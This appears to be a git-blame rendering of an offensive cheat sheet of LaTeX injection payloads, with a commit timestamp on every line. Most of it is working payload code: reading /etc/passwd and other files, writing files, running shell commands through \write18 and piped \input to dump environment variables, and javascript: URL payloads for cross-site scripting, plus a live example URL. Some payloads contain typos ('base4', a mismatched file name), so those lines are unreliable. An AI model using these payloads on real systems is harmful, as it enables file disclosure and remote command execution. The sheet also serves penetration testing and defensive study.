2018-07-22 20:35:46 +00:00
|
|
|
# LaTex Injection
|
|
|
|
|
|
|
|
## Read file
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-07-22 20:39:37 +00:00
|
|
|
```bash
|
2018-07-22 20:35:46 +00:00
|
|
|
\input{/etc/passwd}
|
|
|
|
\include{password} # load .tex file
|
|
|
|
```
|
|
|
|
|
|
|
|
Read single lined file
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-07-22 20:39:37 +00:00
|
|
|
```bash
|
2018-07-22 20:35:46 +00:00
|
|
|
\newread\file
|
|
|
|
\openin\file=/etc/issue
|
|
|
|
\read\file to\line
|
|
|
|
\text{\line}
|
|
|
|
\closein\file
|
|
|
|
```
|
|
|
|
|
|
|
|
Read multiple lined file
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-07-22 20:39:37 +00:00
|
|
|
```bash
|
2018-07-22 20:35:46 +00:00
|
|
|
\newread\file
|
|
|
|
\openin\file=/etc/passwd
|
|
|
|
\loop\unless\ifeof\file
|
2018-08-12 21:30:22 +00:00
|
|
|
\read\file to\fileline
|
2018-07-22 20:35:46 +00:00
|
|
|
\text{\fileline}
|
|
|
|
\repeat
|
|
|
|
\closein\file
|
|
|
|
```
|
|
|
|
|
2018-08-01 19:19:18 +00:00
|
|
|
Read text file, keep the formatting
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-08-01 19:19:18 +00:00
|
|
|
```bash
|
|
|
|
\usepackage{verbatim}
|
|
|
|
\verbatiminput{/etc/passwd}
|
|
|
|
```
|
|
|
|
|
2018-07-22 20:35:46 +00:00
|
|
|
## Write file
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-07-22 20:39:37 +00:00
|
|
|
```bash
|
2018-07-22 20:35:46 +00:00
|
|
|
\newwrite\outfile
|
|
|
|
\openout\outfile=cmd.tex
|
|
|
|
\write\outfile{Hello-world}
|
|
|
|
\closeout\outfile
|
|
|
|
```
|
|
|
|
|
|
|
|
## Command execution
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-07-22 20:35:46 +00:00
|
|
|
The input of the command will be redirected to stdin, use a temp file to get it.
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-07-22 20:39:37 +00:00
|
|
|
```bash
|
2018-07-22 20:35:46 +00:00
|
|
|
\immediate\write18{env > output}
|
|
|
|
\input{output}
|
|
|
|
```
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-07-22 20:35:46 +00:00
|
|
|
If you get any LaTex error, consider using base64 to get the result without bad characters
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-07-22 20:39:37 +00:00
|
|
|
```bash
|
2018-07-22 20:35:46 +00:00
|
|
|
\immediate\write18{env | base64 > test.tex}
|
|
|
|
\input{text.tex}
|
|
|
|
```
|
|
|
|
|
2018-07-22 20:39:37 +00:00
|
|
|
```bash
|
2018-07-22 20:35:46 +00:00
|
|
|
\input|ls|base4
|
2018-08-01 19:19:18 +00:00
|
|
|
\input{|"/bin/hostname"}
|
2018-07-22 20:35:46 +00:00
|
|
|
```
|
|
|
|
|
2019-03-03 15:31:17 +00:00
|
|
|
## Cross Site Scripting
|
|
|
|
|
|
|
|
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
|
|
|
|
```bash
|
|
|
|
\url{javascript:alert(1)}
|
|
|
|
\href{javascript:alert(1)}{placeholder}
|
|
|
|
```
|
|
|
|
|
|
|
|
Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$`
|
|
|
|
|
2018-12-24 14:02:50 +00:00
|
|
|
## References
|
2018-08-12 21:30:22 +00:00
|
|
|
|
2018-07-22 20:35:46 +00:00
|
|
|
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
|
|
|
|
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
|
|
|
|
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
|